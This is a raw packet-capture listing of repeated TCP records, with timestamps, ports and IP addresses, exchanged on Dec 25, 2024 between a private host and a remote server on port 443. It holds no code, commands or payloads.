                                                                                                                                          Dec 25, 2024 22:17:34.378448009 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.544569016 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.544589043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.544651985 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.544665098 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.544713020 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.548190117 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.548204899 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.548254013 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.548263073 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.548317909 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.551469088 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.551482916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.551534891 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.551543951 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.551582098 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.555893898 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.555907965 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.555970907 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.555979013 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.556030035 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.559139967 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.559154034 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.559207916 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.559216976 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.559256077 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.563133001 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.563147068 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.563200951 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.563215017 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.563257933 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.567265987 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.567281961 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.567333937 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.567342997 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.567383051 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.570683956 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.570708036 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.570741892 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.570749998 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.570781946 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.570792913 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.736584902 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.736602068 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.736668110 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.736701012 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.736746073 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.740067959 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.740082026 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.740120888 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.740129948 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.740148067 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.740225077 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.744232893 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.744247913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.744298935 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.744307995 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.744349003 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.744369984 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.747770071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.747785091 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.747843027 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.747852087 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.747893095 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.751941919 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.751955986 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.752021074 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.752028942 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.752068996 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.755053043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.755067110 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.755121946 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.755131006 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.755147934 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.757805109 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.759278059 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.759293079 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.759358883 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.759367943 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.759411097 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.762661934 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.762676954 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.762711048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.762718916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.762737989 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.762759924 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.928950071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.928966999 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.929162025 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.929179907 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.929229975 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.933059931 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.933074951 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.933150053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.933160067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.933203936 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.936527967 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.936542034 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.936609983 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.936619043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.936665058 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.940632105 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.940646887 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.940720081 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.940732956 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.940776110 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.944158077 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.944173098 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.944269896 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.944282055 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.944327116 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.948067904 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.948084116 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.948146105 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.948154926 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.948195934 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.951507092 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.951523066 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.951592922 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.951601982 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.951646090 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.955707073 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.955724001 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.955787897 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:34.955796957 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:34.955838919 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.121392965 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.121409893 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.121479034 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.121496916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.121540070 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.124783039 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.124797106 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.124871969 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.124881029 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.124926090 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.129019022 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.129033089 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.129091024 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.129098892 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.129132032 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.129143000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.132395983 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.132410049 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.132476091 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.132484913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.132529974 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.136599064 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.136612892 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.136797905 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.136806011 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.136852980 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.140491962 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.140506029 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.140562057 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.140569925 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.140602112 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.140610933 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.143949032 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.143965006 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.144021988 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.144032955 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.144076109 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.148133039 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.148148060 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.148200035 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.148207903 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.148252964 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.313657045 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.313673019 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.313739061 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.313739061 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.313754082 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.313847065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.317610025 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.317625999 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.317707062 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.317717075 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.317730904 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.317806959 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.321316004 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.321335077 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.321391106 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.321399927 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.321450949 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.324625969 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.324641943 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.324718952 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.324729919 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.324743986 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.325359106 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.328778028 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.328793049 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.328847885 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.328856945 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.328915119 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.332787037 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.332802057 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.332844973 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.332853079 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.332881927 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.332894087 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.336189985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.336204052 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.336299896 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.336308956 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.336361885 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.340348005 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.340368032 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.340415955 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.340425968 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.340477943 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.506031990 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.506048918 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.506154060 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.506165981 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.506220102 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.509948015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.509963989 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.510037899 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.510047913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.510112047 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.513365984 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.513381958 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.513487101 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.513495922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.513570070 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.517551899 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.517568111 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.517649889 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.517657995 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.517750978 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.521111965 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.521131992 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.521313906 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.521323919 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.521388054 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.525006056 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.525022984 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.525155067 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.525162935 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.525224924 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.528423071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.528441906 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.528510094 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.528522015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.528587103 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.532520056 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.532536030 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.532602072 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.532610893 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.532654047 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.698440075 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.698455095 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.698529005 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.698542118 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.698601007 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.701982975 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.701997042 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.702073097 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.702080965 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.702163935 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.706042051 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.706059933 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.706131935 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.706140995 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.706192970 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.709464073 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.709479094 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.709538937 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.709547043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.709604025 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.713599920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.713614941 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.713721037 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.713730097 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.713804960 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.717570066 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.717585087 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.717674971 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.717684031 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.717745066 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.721033096 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.721046925 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.721134901 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.721144915 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.721220016 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.724433899 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.724450111 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.724531889 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.724540949 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.724591970 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.890691042 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.890707970 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.890805006 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.890820980 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.890877962 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.894059896 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.894074917 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.894216061 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.894223928 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.894280910 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.898297071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.898313046 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:35.898401022 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:35.898410082 CET44349744172.67.214.186192.168.2.4
